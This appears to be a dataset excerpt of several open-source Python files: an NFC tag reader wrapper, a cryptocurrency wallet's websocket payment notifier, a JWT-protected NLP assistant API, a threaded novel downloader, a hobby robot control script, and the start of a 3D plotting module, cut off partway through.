source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
pn7150.py
|
# https://gist.github.com/doronhorwitz/fc5c4234a9db9ed87c53213d79e63b6c
# https://www.nxp.com/docs/en/application-note/AN11697.pdf explains how to
# setup a demo of the PN7120/PN7150. With that demo comes an executable called
# "nfcDemoApp". This gist is a proof of concept for how to read from that
# executable in Python.
# The class (which is called PN7150, even though it also should support PN7120)
# reads the output from the PN7150 each time a tag is read. It finds the line
# starting with "Text :" and extracts out the text - which is the text stored
# by the NFC tag. The reading is done in a separate thread, which calls a
# callback with the text every time an NFC tag is read. Writing and single
# synchronous reads are also supported
# Lots of inspiration and learning from various places including:
# https://github.com/NXPNFCLinux/linux_libnfc-nci/issues/49#issuecomment-326301
# 669
# https://stackoverflow.com/a/4791612
# https://stackoverflow.com/a/38802275
# https://repolinux.wordpress.com/2012/10/09/non-blocking-read-from-stdin-in-py
# thon/
# https://stackoverflow.com/questions/18225816/indicate-no-more-input-without-c
# losing-pty
import os
import pty
import shlex
import subprocess
import threading
_MAX_WRITE_RETRIES = 5
_OUTPUT_TEXT = "Text :"
_OUTPUT_TAG_WRITTEN = "Write Tag OK"
_OUTPUT_READ_FAILED = "Read NDEF Content Failed"
_OUTPUT_TAG_REMOVED = "NFC Tag Lost"
_CMD_POLL = "{nfc_demo_app_path} poll"
_CMD_WRITE = '{nfc_demo_app_path} write --type=Text -l en -r "{new_text}"'
_NFC_DEMO_APP_NAME = "nfcDemoApp"
_NFC_DEMO_APP_DEFAULT_LOCATION = "/usr/sbin"
class PN7150Exception(Exception):
pass
class PN7150:
"""
Can use this class as follows:
pn7150 = PN7150()
Start Continuous Reading
========================
def text_callback(text):
... do something with text
pn7150.when_tag_read = text_callback
pn7150.start_reading()
Stop Continuous Reading (be sure to do this before your program ends)
=======================
pn7150.stop_reading()
Read Once
=========
text = pn7150.read_once()
Write
=====
success = pn7150.write("some text")
"""
def __init__(self, nfc_demo_app_location=_NFC_DEMO_APP_DEFAULT_LOCATION):
self._nfc_demo_app_location = nfc_demo_app_location
self._read_running = False
self._proc = None
self._slave = None
self.when_tag_read = None
def _open_process(self, mode, **cmd_arguments):
if mode == "r":
cmd_string = _CMD_POLL
elif mode == "w":
cmd_string = _CMD_WRITE
else:
raise PN7150Exception("mode must be 'r' or 'w'")
cmd = cmd_string.format(
nfc_demo_app_path=self._nfc_demo_app_path, **cmd_arguments
)
master, slave = pty.openpty()
proc = subprocess.Popen(
shlex.split(cmd), stdin=subprocess.PIPE, stdout=slave, stderr=slave
)
stdout = os.fdopen(master)
return proc, slave, stdout
def _read_thread(self):
self._proc, self._slave, stdout = self._open_process("r")
self._read_running = True
while self._read_running:
try:
line = stdout.readline()
if _OUTPUT_TEXT in line:
first = line.find("'")
last = line.rfind("'")
text = line[first + 1 : last]
if self.when_tag_read:
self.when_tag_read(text)
except OSError:
pass
@property
def _nfc_demo_app_path(self):
return os.path.join(self._nfc_demo_app_location, _NFC_DEMO_APP_NAME)
def start_reading(self):
if not self._read_running:
thread = threading.Thread(target=self._read_thread)
thread.start()
def stop_reading(self):
if self._read_running:
self._proc.terminate()
self._read_running = False
os.close(self._slave)
def read_once(self, wait_for_tag_removal=True):
if self._read_running:
raise PN7150Exception("cannot read_once while a continuous read is running")
proc, slave, stdout = self._open_process("r")
been_read = False
been_removed = not wait_for_tag_removal
text = None
while not been_read or not been_removed:
line = stdout.readline()
if _OUTPUT_TEXT in line:
first = line.find("'")
last = line.rfind("'")
text = line[first + 1 : last]
been_read = True
elif _OUTPUT_READ_FAILED in line:
been_read = True
elif _OUTPUT_TAG_REMOVED in line:
been_removed = True
proc.terminate()
os.close(slave)
return text
def _write(self, new_text, wait_for_tag_removal=True):
proc, slave, stdout = self._open_process("w", new_text=new_text)
been_written = False
been_checked = False
been_removed = not wait_for_tag_removal
checked_text = None
while not been_written or not been_checked or not been_removed:
line = stdout.readline()
if _OUTPUT_TAG_WRITTEN in line:
been_written = True
elif been_written and _OUTPUT_TEXT in line:
first = line.find("'")
last = line.rfind("'")
checked_text = line[first + 1 : last]
been_checked = True
elif _OUTPUT_TAG_REMOVED in line:
been_removed = True
proc.terminate()
os.close(slave)
return checked_text == new_text
def write(self, new_text, wait_for_tag_removal=True):
if self._read_running:
raise PN7150Exception("cannot write while a continuous read is running")
existing_text = self.read_once(wait_for_tag_removal=wait_for_tag_removal)
success = False
if existing_text != new_text:
count = 0
while not success and count < _MAX_WRITE_RETRIES:
success = self._write(
new_text, wait_for_tag_removal=wait_for_tag_removal
)
return success
else:
success = True
return success
|
websockets.py
|
#!/usr/bin/env python
#
# Electrum-Ganja - lightweight Ganjacoin client
# Copyright (C) 2015 Thomas Voegtlin
# Copyright (C) 2018 GanjaProject
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import queue
import threading, os, json
from collections import defaultdict
try:
from SimpleWebSocketServer import WebSocket, SimpleSSLWebSocketServer
except ImportError:
import sys
sys.exit("install SimpleWebSocketServer")
from . import util
request_queue = queue.Queue()
class Electrum_GanjaWebSocket(WebSocket):
def handleMessage(self):
assert self.data[0:3] == 'id:'
util.print_error("message received", self.data)
request_id = self.data[3:]
request_queue.put((self, request_id))
def handleConnected(self):
util.print_error("connected", self.address)
def handleClose(self):
util.print_error("closed", self.address)
class WsClientThread(util.DaemonThread):
def __init__(self, config, network):
util.DaemonThread.__init__(self)
self.network = network
self.config = config
self.response_queue = queue.Queue()
self.subscriptions = defaultdict(list)
def make_request(self, request_id):
# read json file
rdir = self.config.get('requests_dir')
n = os.path.join(rdir, 'req', request_id[0], request_id[1], request_id, request_id + '.json')
with open(n, encoding='utf-8') as f:
s = f.read()
d = json.loads(s)
addr = d.get('address')
amount = d.get('amount')
return addr, amount
def reading_thread(self):
while self.is_running():
try:
ws, request_id = request_queue.get()
except queue.Empty:
continue
try:
addr, amount = self.make_request(request_id)
except:
continue
l = self.subscriptions.get(addr, [])
l.append((ws, amount))
self.subscriptions[addr] = l
#self.network.subscribe_to_addresses([addr], self.response_queue.put)
self.network.send([('blockchain.address.subscribe', [addr])], self.response_queue.put)
def run(self):
threading.Thread(target=self.reading_thread).start()
while self.is_running():
try:
r = self.response_queue.get(timeout=0.1)
except queue.Empty:
continue
util.print_error('response', r)
method = r.get('method')
params = r.get('params')
result = r.get('result')
if result is None:
continue
if method == 'blockchain.address.subscribe':
self.network.send([('blockchain.address.get_balance', params)], self.response_queue.put)
elif method == 'blockchain.address.get_balance':
h = params[0]
addr = self.network.h2addr.get(h, None)
if addr is None:
util.print_error("can't find address for scripthash: %s" % h)
l = self.subscriptions.get(addr, [])
for ws, amount in l:
if not ws.closed:
if sum(result.values()) >=amount:
ws.sendMessage('paid')
class WebSocketServer(threading.Thread):
def __init__(self, config, ns):
threading.Thread.__init__(self)
self.config = config
self.net_server = ns
self.daemon = True
def run(self):
t = WsClientThread(self.config, self.net_server)
t.start()
host = self.config.get('websocket_server')
port = self.config.get('websocket_port', 9999)
certfile = self.config.get('ssl_chain')
keyfile = self.config.get('ssl_privkey')
self.server = SimpleSSLWebSocketServer(host, port, Electrum_GanjaWebSocket, certfile, keyfile)
self.server.serveforever()
|
api.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
.. module:: api
:platform: Unix
:synopsis: the API of Dragonfire that contains the endpoints.
.. moduleauthor:: Mehmet Mert Yıldıran <mert.yildiran@bil.omu.edu.tr>
"""
from threading import Thread # Thread-based parallelism
import json # JSON encoder and decoder
import re # Regular expression operations
from random import randrange # Generate pseudo-random numbers
from datetime import datetime # Basic date and time types
from dragonfire.config import Config # Credentials for the database connection
from dragonfire.arithmetic import arithmetic_parse # Submodule of Dragonfire to analyze arithmetic expressions
from dragonfire.database import User, Notification # Submodule of Dragonfire module that contains the database schema
from dragonfire.utilities import TextToAction # Submodule of Dragonfire to provide various utilities
import hug # Embrace the APIs of the future
from hug_middleware_cors import CORSMiddleware # Middleware for allowing CORS (cross-origin resource sharing) requests from hug servers
import waitress # A production-quality pure-Python WSGI server with very acceptable performance
import wikipedia as wikipedia_lib # Python library that makes it easy to access and parse data from Wikipedia
import youtube_dl # Command-line program to download videos from YouTube.com and other video sites
import jwt # JSON Web Token implementation in Python
from sqlalchemy.orm.exc import NoResultFound # the Python SQL toolkit and Object Relational Mapper
@hug.authentication.token
def token_authentication(token):
"""Method to compare the given token with precomputed token.
Args:
token (str): API token.
Returns:
bool. The return code::
True -- The token is correct!
False -- The token is invalid!
"""
try:
jwt.decode(token, Config.SUPER_SECRET_KEY, algorithm='HS256')
return True
except:
return False
# Natural Language Processing realted API endpoints START
@hug.post('/tag', requires=token_authentication)
def tagger_end(text):
"""**Endpoint** to return **POS Tagging** result of the given text.
Args:
text (str): Text.
Returns:
JSON document.
"""
return json.dumps(tagger(text), indent=4)
def tagger(text):
"""Method to encapsulate **POS Tagging** process.
Args:
text (str): Text.
Returns:
(list) of (dict)s: List of dictionaries.
"""
data = []
doc = nlp(text)
for token in doc:
parse = {
'text': token.text,
'lemma': token.lemma_,
'pos': token.pos_,
'tag': token.tag_,
'dep': token.dep_,
'shape': token.shape_,
'is_alpha': token.is_alpha,
'is_stop': token.is_stop
}
data.append(parse)
return data
@hug.post('/dep', requires=token_authentication)
def dependency_parser_end(text):
"""**Endpoint** to return **Dependency Parse** result of the given text.
Args:
text (str): Text.
Returns:
JSON document.
"""
return json.dumps(dependency_parser(text), indent=4)
def dependency_parser(text):
"""Method to encapsulate **Dependency Parse** process.
Args:
text (str): Text.
Returns:
(list) of (dict)s: List of dictionaries.
"""
data = []
doc = nlp(text)
for chunk in doc.noun_chunks:
parse = {
'text': chunk.text,
'root_text': chunk.root.text,
'root_dep': chunk.root.dep_,
'root_head_text': chunk.root.head.text,
}
data.append(parse)
return data
@hug.post('/ner', requires=token_authentication)
def entity_recognizer_end(text):
"""**Endpoint** to return **Named Entity Recognition** result of the given text.
Args:
text (str): Text.
Returns:
JSON document.
"""
return json.dumps(entity_recognizer(text), indent=4)
def entity_recognizer(text):
"""Method to encapsulate **Named Entity Recognition** process.
Args:
text (str): Text.
Returns:
(list) of (dict)s: List of dictionaries.
"""
data = []
doc = nlp(text)
for ent in doc.ents:
parse = {
'text': ent.text,
'start_char': ent.start_char,
'end_char': ent.end_char,
'label': ent.label_,
}
data.append(parse)
return data
@hug.post('/token', requires=token_authentication)
def tokenizer_end(text):
"""**Endpoint** to **tokenize** the given text.
Args:
text (str): Text.
Returns:
JSON document.
"""
return json.dumps(tokenizer(text), indent=4)
def tokenizer(text):
"""Method to encapsulate **tokenization** process.
Args:
text (str): Text.
Returns:
(list) of (dict)s: List of dictionaries.
"""
data = []
doc = nlp(text)
for token in doc:
data.append(token.text)
return data
@hug.post('/sent', requires=token_authentication)
def sentence_segmenter_end(text):
"""**Endpoint** to return **Sentence Segmentation** result of the given text.
Args:
text (str): Text.
Returns:
JSON document.
"""
return json.dumps(sentence_segmenter(text), indent=4)
def sentence_segmenter(text):
"""Method to encapsulate **Sentence Segmentation** process.
Args:
text (str): Text.
Returns:
(list) of (dict)s: List of dictionaries.
"""
data = []
doc = nlp(text)
for sent in doc.sents:
data.append(sent.text)
return data
# All-in-One NLP
@hug.post('/cmd', requires=token_authentication)
def cmd(text):
"""Serves the **all Natural Language Processing features** (parsers) of :mod:`spacy` in a single **endpoint**.
Combines the results of these methods into a single JSON document:
- :func:`dragonfire.api.tagger` method (**POS Tagging**)
- :func:`dragonfire.api.dependency_parser` method (**Dependency Parse**)
- :func:`dragonfire.api.entity_recognizer` method (**Named Entity Recognition**)
Args:
text (str): Text.
Returns:
JSON document.
"""
data = []
sents = sentence_segmenter(text)
for sent in sents:
sent_data = {}
sent_data['tags'] = tagger(sent)
sent_data['deps'] = dependency_parser(sent)
sent_data['ners'] = entity_recognizer(sent)
data.append(sent_data)
return json.dumps(data, indent=4)
# Natural Language Processing realted API endpoints END
# Directly on server-side Q&A related API endpoints START
@hug.post('/math', requires=token_authentication)
def math(text):
"""**Endpoint** to return the response of :func:`dragonfire.arithmetic.arithmetic_parse` function.
Args:
text (str): Text.
Returns:
JSON document.
"""
response = arithmetic_parse(text)
if not response:
response = ""
return json.dumps(response, indent=4)
@hug.post('/learn', requires=token_authentication)
def learn(text, user_id):
"""**Endpoint** to return the response of :func:`dragonfire.learn.Learner.respond` method.
Args:
text (str): Text.
user_id (int): User's ID.
Returns:
JSON document.
"""
response = learner.respond(text, is_server=True, user_id=user_id)
if not response:
response = ""
return json.dumps(response, indent=4)
@hug.post('/omni', requires=token_authentication)
def omni(text, gender_prefix):
"""**Endpoint** to return the answer of :func:`dragonfire.odqa.ODQA.respond` method.
Args:
text (str): Text.
gender_prefix (str): Prefix to address/call user when answering.
Returns:
JSON document.
"""
answer = odqa.respond(text, userin=userin, user_prefix=gender_prefix, is_server=True)
if not answer:
answer = ""
return json.dumps(answer, indent=4)
@hug.post('/deep', requires=token_authentication)
def deep(text, gender_prefix):
"""**Endpoint** to return the response of :func:`dragonfire.deepconv.DeepConversation.respond` method.
Args:
text (str): Text.
gender_prefix (str): Prefix to address/call user when answering.
Returns:
JSON document.
"""
answer = dc.respond(text, user_prefix=gender_prefix)
return json.dumps(answer, indent=4)
# All-in-One Answering
@hug.post('/answer', requires=token_authentication)
def answer(text, gender_prefix, user_id, previous=None):
"""Serves the **all Q&A related API endpoints** in a single **endpoint**.
Combines the results of these methods into a single JSON document:
- :func:`dragonfire.arithmetic.arithmetic_parse` function
- :func:`dragonfire.learn.Learner.respond` method
- :func:`dragonfire.odqa.ODQA.respond` method
- :func:`dragonfire.deepconv.DeepConversation.respond` method
Args:
text (str): User's current command.
gender_prefix (str): Prefix to address/call user when answering.
user_id (int): User's ID.
previous (str): User's previous command.
Returns:
JSON document.
"""
data = {}
text = coref.resolve_api(text, previous)
subject, subjects, focus, subject_with_objects = odqa.semantic_extractor(text)
data['subject'] = subject
data['focus'] = focus
answer = arithmetic_parse(text)
if not answer:
answer = learner.respond(text, is_server=True, user_id=user_id)
if not answer:
answer = odqa.respond(text, userin=userin, user_prefix=gender_prefix, is_server=True)
if not answer:
answer = dc.respond(text, user_prefix=gender_prefix)
data['answer'] = answer
return json.dumps(data, indent=4)
# Directly on server-side Q&A related API endpoints END
@hug.post('/wikipedia', requires=token_authentication)
def wikipedia(query, gender_prefix):
"""**Endpoint** to make a **Wikipedia search** and return its **text content**.
Args:
query (str): Search query.
gender_prefix (str): Prefix to address/call user when answering.
Returns:
JSON document.
"""
global userin
response = ""
url = ""
wikiresult = wikipedia_lib.search(query)
if len(wikiresult) == 0:
response = "Sorry, " + gender_prefix + ". But I couldn't find anything about " + query + " in Wikipedia."
else:
wikipage = wikipedia_lib.page(wikiresult[0])
wikicontent = TextToAction.fix_the_encoding_in_text_for_tts(wikipage.content)
wikicontent = re.sub(r'\([^)]*\)', '', wikicontent)
response = " ".join(sentence_segmenter(wikicontent)[:3])
url = wikipage.url
data = {}
data['response'] = response
data['url'] = url
return json.dumps(data, indent=4)
@hug.post('/youtube', requires=token_authentication)
def youtube(query, gender_prefix):
"""**Endpoint** to make a **YouTube search** and return the **video title** and **URL**.
Args:
query (str): Search query.
gender_prefix (str): Prefix to address/call user when answering.
Returns:
JSON document.
"""
response = ""
url = ""
info = youtube_dl.YoutubeDL({}).extract_info('ytsearch:' + query, download=False, ie_key='YoutubeSearch')
if len(info['entries']) > 0:
response = info['entries'][0]['title']
url = "https://www.youtube.com/watch?v=%s" % (info['entries'][0]['id'])
response = "".join([
i if ord(i) < 128 else ' '
for i in response
])
else:
response = "No video found, " + gender_prefix + "."
data = {}
data['response'] = response
data['url'] = url
return json.dumps(data, indent=4)
@hug.post('/notification', requires=token_authentication)
def notification(user_id, location, gender_prefix, response=None):
"""**Endpoint** to serve the **notifications** from the **database**.
Args:
user_id (int): User's ID.
location (str): *Development in progress...*
gender_prefix (str): Prefix to address/call user when answering.
Returns:
JSON document.
"""
try:
user = db_session.query(User).filter(User.id == int(user_id)).one()
if not db_session.query(Notification).count() > 0:
response.status = hug.HTTP_404
return
rand = randrange(0, db_session.query(Notification).count())
notification = db_session.query(Notification).filter(Notification.is_active)[rand]
if notification.capitalize == 1:
gender_prefix = gender_prefix.capitalize()
data = {}
data['url'] = notification.url
data['title'] = notification.title
data['message'] = notification.message.format(gender_prefix, user.name)
return json.dumps(data, indent=4)
except NoResultFound:
response.status = hug.HTTP_404
return
# Endpoint to handle registration requests
@hug.post('/register')
def register(name, gender, birth_date, reg_key, response=None):
"""**Endpoint** to handle **registration requests**.
Args:
name (str): User's name.
gender (str): User's gender.
birth_date (str): User's birth date.
reg_key (str): Registration key.
Returns:
JSON document.
"""
if reg_key != server_reg_key:
response.status = hug.HTTP_403
return
new_user = User(name=name, gender=gender, birth_date=datetime.strptime(birth_date, "%Y-%m-%d").date())
db_session.add(new_user)
db_session.commit()
data = {}
data['id'] = new_user.id
data['token'] = jwt.encode({'id': new_user.id, 'name': name, 'gender': gender, 'birth_date': birth_date}, Config.SUPER_SECRET_KEY, algorithm='HS256').decode('ascii')
return json.dumps(data, indent=4)
class Run():
"""Class to Run the API.
.. note::
Creating an object from this class is automatically starts the API server.
"""
def __init__(self, nlp_ref, learner_ref, odqa_ref, dc_ref, coref_ref, userin_ref, reg_key, port_number, db_session_ref, dont_block=False):
"""Initialization method of :class:`dragonfire.api.Run` class
This method starts an API server using :mod:`waitress` (*a pure-Python WSGI server*)
on top of lightweight :mod:`hug` API framework.
Args:
nlp_ref: :mod:`spacy` model instance.
learner_ref: :class:`dragonfire.learn.Learner` instance.
odqa_ref: :class:`dragonfire.odqa.ODQA` instance.
dc_ref: :class:`dragonfire.deepconv.DeepConversation` instance.
userin_ref: :class:`dragonfire.utilities.TextToAction` instance.
reg_key (str): Registration key of the API.
port_number (int): Port number that the API will be served.
db_session_ref: SQLAlchemy's :class:`DBSession()` instance.
"""
global __hug_wsgi__ # Fixes flake8 F821: Undefined name
global nlp
global learner
global odqa
global dc
global coref
global userin
global server_reg_key
global db_session
nlp = nlp_ref # Load en_core_web_sm, English, 50 MB, default model
learner = learner_ref
odqa = odqa_ref
dc = dc_ref
coref = coref_ref
userin = userin_ref
server_reg_key = reg_key
db_session = db_session_ref
app = hug.API(__name__)
app.http.output_format = hug.output_format.text
app.http.add_middleware(CORSMiddleware(app))
self.waitress_thread = Thread(target=waitress.serve, args=(__hug_wsgi__, ), kwargs={"port": port_number})
if dont_block:
self.waitress_thread.daemon = True
self.waitress_thread.start()
if not dont_block:
self.waitress_thread.join()
if __name__ == '__main__':
global __hug_wsgi__ # Fixes flake8 F821: Undefined name
app = hug.API(__name__)
app.http.output_format = hug.output_format.text
app.http.add_middleware(CORSMiddleware(app))
waitress.serve(__hug_wsgi__, port=8000)
|
novelSpider.py
|
import time
import queue
import threading
from modules import noveldownload
from modules import search
def work(q):
while True:
if q.empty():
return
else:
r = q.get()
url = r['url']
novelName = r['name']
tid = r['index']
print("threadId-{} novelName-{} , url-{} downloading...".format(tid,novelName,url))
noveldownload.get_novel_by_home_url(url)
print("threadId-{} novelName-{} , url-{} finished.".format(tid,novelName,url))
def main(searchResultGroup,condition,thread_num = 5):
q = queue.Queue()
for r in searchResultGroup:
if condition['isSameName']:
if r['name'] == condition['searchKey']:
q.put(r)
else:
q.put(r)
threads = []
for i in range(thread_num):
t = threading.Thread(target=work, args=(q,))
threads.append(t)
for i in range(thread_num):
threads[i].start()
for i in range(thread_num):
threads[i].join()
if __name__ == "__main__":
start = time.time()
novelSource = 'shuquge'
# novelSource = 'soshuw'
searchKey = '傲世九重天'
search.initNovelSource(novelSource)
noveldownload.initNovelSource(novelSource)
condition = {}
condition['isSameName'] = True
condition['searchKey'] = searchKey
searchResultGroup = search.get_search_result_group_by_search_key(searchKey,novelSource)
print(searchResultGroup)
main(searchResultGroup,condition)
print('耗时:', time.time() - start)
|
beo_threads.py
|
"""Activates arm mirror, changes eyes and says a short sentence every few seconds"""
from time import sleep
from random import randint
import subprocess
import threading
from Movements import Movements
from Audio import Audio
from Eyes import Eyes
MOVEMENTS = Movements()
AUDIO = Audio()
EYES = Eyes()
def arm_mirror():
"""Makes the angle of beo's left arm match the angle of beo's right arm"""
MOVEMENTS.disable_all_joints()
while True:
for i in range(3):
angle = MOVEMENTS.get_raw_angle(i*2)
MOVEMENTS.set_raw_angle(i*2 +1, angle)
sleep(0.01)
def eye_change():
"""Changes beo's eye expressions every few seconds"""
expressions = ['wink', 'shut', 'sad', 'mad', 'default']
while True:
for i in expressions:
EYES.set_expression(i)
sleep(20)
def speak():
"""Says a short sentence every few seconds"""
sentences = ['DESTROY ALL HU- I MEAN GREETINGS MEAT BAG',
'She sells sea shells by the sea shore', 'Other sentence']
while True:
AUDIO.speak(sentences[randint(0, 2)])
sleep(15)
def nod():
"""Moves beo's had back and forth every few seconds"""
while True:
MOVEMENTS.set_raw_angle(7, 52)
sleep(2)
MOVEMENTS.set_raw_angle(7, 0)
sleep(2)
def camera():
"""Takes a picture every minute"""
while True:
subprocess.check_output(['fswebcam', 'image.jpg'])
sleep(60)
def main():
"""Main function, creates the threads"""
thread1 = threading.Thread(target=arm_mirror)
thread2 = threading.Thread(target=eye_change)
thread3 = threading.Thread(target=speak)
thread4 = threading.Thread(target=nod)
thread5 = threading.Thread(target=camera)
#Starts the threads.
thread1.start()
thread2.start()
thread3.start()
thread4.start()
thread5.start()
#Joins the threads
thread1.join()
thread2.join()
thread3.join()
thread4.join()
thread5.join()
if __name__ == "__main__":
main()
|
plotting.py
|
"""
pyvista plotting module
"""
import collections
import logging
import os
import time
from threading import Thread
import imageio
import numpy as np
import scooby
import vtk
from vtk.util import numpy_support as VN
import pyvista
from pyvista.utilities import (convert_array, convert_string_array,
get_array, is_pyvista_dataset, numpy_to_texture,
raise_not_matching, wrap)
from .colors import get_cmap_safe
from .export_vtkjs import export_plotter_vtkjs
from .mapper import make_mapper
from .picking import PickingHelper
from .theme import *
from .tools import *
from .widgets import WidgetHelper
_ALL_PLOTTERS = {}
def close_all():
"""Close all open/active plotters and clean up memory"""
for key, p in _ALL_PLOTTERS.items():
p.close()
p.deep_clean()
_ALL_PLOTTERS.clear()
return True
log = logging.getLogger(__name__)
log.setLevel('CRITICAL')
class BasePlotter(PickingHelper, WidgetHelper):
"""
To be used by the Plotter and QtInteractor classes.
Parameters
----------
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one renderer.
border : bool, optional
Draw a border around each render window. Default False.
border_color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
border_width : float, optional
Width of the border in pixels when enabled.
"""
def __new__(cls, *args, **kwargs):
if cls is BasePlotter:
raise TypeError("pyvista.BasePlotter is an abstract class and may not be instantiated.")
return object.__new__(cls)
def __init__(self, shape=(1, 1), border=None, border_color='k',
border_width=2.0, title=None):
""" Initialize base plotter """
self.image_transparent_background = rcParams['transparent_background']
if title is None:
title = rcParams['title']
self.title = str(title)
# by default add border for multiple plots
if border is None:
if shape != (1, 1):
border = True
else:
border = False
# add render windows
self.renderers = []
self._active_renderer_index = 0
assert_str = '"shape" should be a list or tuple'
assert isinstance(shape, collections.Iterable), assert_str
assert shape[0] > 0, '"shape" must be positive'
assert shape[1] > 0, '"shape" must be positive'
self.shape = shape
for i in reversed(range(shape[0])):
for j in range(shape[1]):
renderer = pyvista.Renderer(self, border, border_color, border_width)
x0 = i/shape[0]
y0 = j/shape[1]
x1 = (i+1)/shape[0]
y1 = (j+1)/shape[1]
renderer.SetViewport(y0, x0, y1, x1)
self.renderers.append(renderer)
# This keeps track of scalar names already plotted and their ranges
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
self._scalar_bar_actors = {}
self._scalar_bar_widgets = {}
# track if the camera has been setup
# self.camera_set = False
self._first_time = True
# Keep track of the scale
self._labels = []
# Set default style
self._style = vtk.vtkInteractorStyleRubberBandPick()
# Add self to open plotters
_ALL_PLOTTERS[str(hex(id(self)))] = self
# lighting style
self.lighting = vtk.vtkLightKit()
# self.lighting.SetHeadLightWarmth(1.0)
# self.lighting.SetHeadLightWarmth(1.0)
for renderer in self.renderers:
self.lighting.AddLightsToRenderer(renderer)
renderer.LightFollowCameraOn()
# Key bindings
self.reset_key_events()
def add_key_event(self, key, callback):
"""Add a function to callback when the given key is pressed. These are
non-unique - thus a key could map to many callback functions.
The callback function must not have any arguments.
Parameters
----------
key : str
The key to trigger the event
callback : callable
A callable that takes no arguments
"""
if not hasattr(callback, '__call__'):
raise TypeError('callback must be callable.')
self._key_press_event_callbacks[key].append(callback)
def clear_events_for_key(self, key):
self._key_press_event_callbacks.pop(key)
def reset_key_events(self):
"""Reset all of the key press events to their defaults."""
self._key_press_event_callbacks = collections.defaultdict(list)
def _close_callback():
""" Make sure a screenhsot is acquired before closing"""
self.q_pressed = True
# Grab screenshot right before renderer closes
self.last_image = self.screenshot(True, return_img=True)
self.add_key_event('q', _close_callback)
b_left_down_callback = lambda: self.iren.AddObserver('LeftButtonPressEvent', self.left_button_down)
self.add_key_event('b', b_left_down_callback)
self.add_key_event('v', lambda: self.isometric_view_interactive())
def key_press_event(self, obj, event):
""" Listens for key press event """
key = self.iren.GetKeySym()
log.debug('Key %s pressed' % key)
if key in self._key_press_event_callbacks.keys():
# Note that defaultdict's will never throw a key error
callbacks = self._key_press_event_callbacks[key]
for func in callbacks:
func()
def left_button_down(self, obj, event_type):
"""Register the event for a left button down click"""
# Get 2D click location on window
click_pos = self.iren.GetEventPosition()
# Get corresponding click location in the 3D plot
picker = vtk.vtkWorldPointPicker()
picker.Pick(click_pos[0], click_pos[1], 0, self.renderer)
self.pickpoint = np.asarray(picker.GetPickPosition()).reshape((-1, 3))
if np.any(np.isnan(self.pickpoint)):
self.pickpoint[:] = 0
def update_style(self):
if not hasattr(self, '_style'):
self._style = vtk.vtkInteractorStyleTrackballCamera()
if hasattr(self, 'iren'):
return self.iren.SetInteractorStyle(self._style)
def enable_trackball_style(self):
""" sets the interactive style to trackball - the default syle """
self._style = vtk.vtkInteractorStyleTrackballCamera()
return self.update_style()
def enable_image_style(self):
""" sets the interactive style to image
Controls:
- Left Mouse button triggers window level events
- CTRL Left Mouse spins the camera around its view plane normal
- SHIFT Left Mouse pans the camera
- CTRL SHIFT Left Mouse dollys (a positional zoom) the camera
- Middle mouse button pans the camera
- Right mouse button dollys the camera.
- SHIFT Right Mouse triggers pick events
"""
self._style = vtk.vtkInteractorStyleImage()
return self.update_style()
def enable_joystick_style(self):
""" sets the interactive style to joystick
allows the user to move (rotate, pan, etc.) the camera, the point of
view for the scene. The position of the mouse relative to the center of
the scene determines the speed at which the camera moves, and the speed
of the mouse movement determines the acceleration of the camera, so the
camera continues to move even if the mouse if not moving.
For a 3-button mouse, the left button is for rotation, the right button
for zooming, the middle button for panning, and ctrl + left button for
spinning. (With fewer mouse buttons, ctrl + shift + left button is
for zooming, and shift + left button is for panning.)
"""
self._style = vtk.vtkInteractorStyleJoystickCamera()
return self.update_style()
def enable_zoom_style(self):
""" sets the interactive style to rubber band zoom
This interactor style allows the user to draw a rectangle in the render
window using the left mouse button. When the mouse button is released,
the current camera zooms by an amount determined from the shorter side
of the drawn rectangle.
"""
self._style = vtk.vtkInteractorStyleRubberBandZoom()
return self.update_style()
def enable_terrain_style(self):
""" sets the interactive style to terrain
Used to manipulate a camera which is viewing a scene with a natural
view up, e.g., terrain. The camera in such a scene is manipulated by
specifying azimuth (angle around the view up vector) and elevation
(the angle from the horizon).
"""
self._style = vtk.vtkInteractorStyleTerrain()
return self.update_style()
def enable_rubber_band_style(self):
""" sets the interactive style to rubber band picking
This interactor style allows the user to draw a rectangle in the render
window by hitting 'r' and then using the left mouse button.
When the mouse button is released, the attached picker operates on the
pixel in the center of the selection rectangle. If the picker happens to
be a vtkAreaPicker it will operate on the entire selection rectangle.
When the 'p' key is hit the above pick operation occurs on a 1x1
rectangle. In other respects it behaves the same as its parent class.
"""
self._style = vtk.vtkInteractorStyleRubberBandPick()
return self.update_style()
def set_focus(self, point):
""" sets focus to a point """
if isinstance(point, np.ndarray):
if point.ndim != 1:
point = point.ravel()
self.camera.SetFocalPoint(point)
self._render()
def set_position(self, point, reset=False):
""" sets camera position to a point """
if isinstance(point, np.ndarray):
if point.ndim != 1:
point = point.ravel()
self.camera.SetPosition(point)
if reset:
self.reset_camera()
self.camera_set = True
self._render()
def set_viewup(self, vector):
""" sets camera viewup vector """
if isinstance(vector, np.ndarray):
if vector.ndim != 1:
vector = vector.ravel()
self.camera.SetViewUp(vector)
self._render()
def _render(self):
""" redraws render window if the render window exists """
if hasattr(self, 'ren_win'):
if hasattr(self, 'render_trigger'):
